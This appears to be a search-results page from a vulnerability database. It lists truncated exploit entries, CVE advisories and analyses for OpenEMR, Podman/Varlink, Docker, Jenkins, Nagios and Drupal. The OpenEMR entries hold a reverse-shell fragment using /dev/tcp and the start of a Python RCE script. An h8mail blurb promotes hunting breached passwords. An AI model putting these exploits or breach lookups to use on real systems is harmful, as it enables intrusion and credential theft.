282 matches found
Reduce the Attack Surface of Your Container Images
Follow along as Chuck Losh, Solutions Architect, walks through a new way of thinking in how to construct distroless images from Google, using an example of a multi-stage Dockerfile method...
OpenEMR - Remote Code Execution
OpenEMR versions prior to 5.0.1 suffer from a remote code execution vulnerability. Title: OpenEMR 5.0.1 - Remote Code Execution Exploit Author: Musyoka Ian Date: 2020-05-25 Title: OpenEMR 5.0.1 - Remote Code Execution Vendor Homepage: https://www.open-emr.org/ Software Link:...
OpenEMR 5.0.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications Title: OpenEMR 5.0.1 - Remote Code Execution Exploit Author: Musyoka Ian Title: OpenEMR 5.0.1 - Remote Code Execution Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Dockerfile:...
DEBIAN-CVE-2014-9356
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an 1 image or 2 build in a Dockerfile...
UBUNTU-CVE-2014-9356
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an 1 image or 2 build in a Dockerfile...
Path traversal
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an 1 image or 2 build in a Dockerfile...
CVE-2014-9356
Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an 1 image or 2 build in a Dockerfile...
Podman / Varlink Remote Code Execution
!/usr/bin/python -- coding: UTF-8 -- pickletime.py Podman + Varlink Insecure Config Remote Exploit Jeremy Brown jbrown3264/gmail @ Oct 2019 ------- Details ------- Podman is container engine / platform similar to Docker supported by RedHat and Fedora with Varlink being a protocol to exchange...
Podman & Varlink 1.5.1 - Remote Code Execution Exploit
Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution Exploit Author: Jeremy Brown Date: 2019-10-15 Vendor Homepage: https://podman.io/ Software Link: dnf install podman or https://github.com/containers/libpod/releases Version: 1.5.1 Tested on: Fedora Server 30 !/usr/bin/python -- coding:...
openSUSE Security Update : podman / slirp4netns and libcontainers-common (openSUSE-2019-2044)
This is a version update for podman to version 1.4.4 bsc1143386. Additional changes by SUSE on top : - Remove fuse-overlayfs because it's currently an unsatisfied dependency on SLE bsc1143386 - Update libpod.conf to use correct infracommand - Update libpod.conf to use better versioned pause...
H8Mail v2.0 - Email OSINT And Password Breach Hunting
Powerful and user-friendly password finder. Use h8mail to find passwords through different breach and reconnaissance services, or using local breaches such as Troy Hunt's "Collection1" or the infamous "Breach Compilation" torrent. Features Email pattern matching reg exp, useful for reading from...
Jenkins Swarm Plugin XML external entities information disclosure vulnerability
Summary The Jenkins Self-Organizing Swarm Modules Plugin, version 3.14, contains a trivial XXE XML External Entities vulnerability inside of the getCandidateFromDatagramResponses method. As a result of this issue, it is possible for an attacker on the same network as a Swarm client to read...
Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Gitlab
This repository is an offensive tool for a vulnerability environment. It is a Docker-Compose file for a vulnerability environment. The repository contains a .gitignore file, a README.md file, and several other files that are used to configure the environment. The .gitignore file contains a list o...
OpenEMR < 5.0.1 - Remote Code Execution
Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...
OpenEMR 5.0.1.3 Remote Code Execution
Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
Title: OpenEMR 5.0.1.3 - Remote Code Execution Authenticated Author: Cody Zacharias Date: 2018-08-07 Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile...
SUSE-SU-2018:0065-1 Fixing security issues on OBS toolchain
This OBS toolchain update fixes the following issues: Package 'build': - CVE-2017-14804: Improve file name check extractbuild bsc1069904 - Fixed Dockerfile repository parsing Package 'obs-service-sourcevalidator': - CVE-2017-9274: Don't use rpmbuild to extract sources, patches etc. from a spec...
Remote Code Execution (RCE)
github.com/docker/docker is vulnerable to remote code execution RCE attacks. This allows attackers to execute code with root privileges through an image or build in a Dockerfile in an LZMA .xz archive...
The Nagios Core code execution vulnerability, CVE-2016-9565 analysis-vulnerability warning-the black bar safety net
Author: p0wd3r, dawu know Chong Yu 404 security lab Date: 2016-12-15 0x00 vulnerability overview 1. Vulnerability description Nagios is a monitoring of the IT infrastructure program, recently security researchers Dawid Golunski found in Nagios Core there is a code execution vulnerability: an...
Drupal 8 configuration file download vulnerability analysis-vulnerability warning-the black bar safety net
Author: p0wd3r know Chong Yu 4 0 4 Security lab Date: 2016-09-22 0x00 vulnerability overview 1. Vulnerability description Drupal ( https://www.drupal.org is a free open source content management system, recent researchers have found in it 8. x 8.1.10 version found three security vulnerabilities,...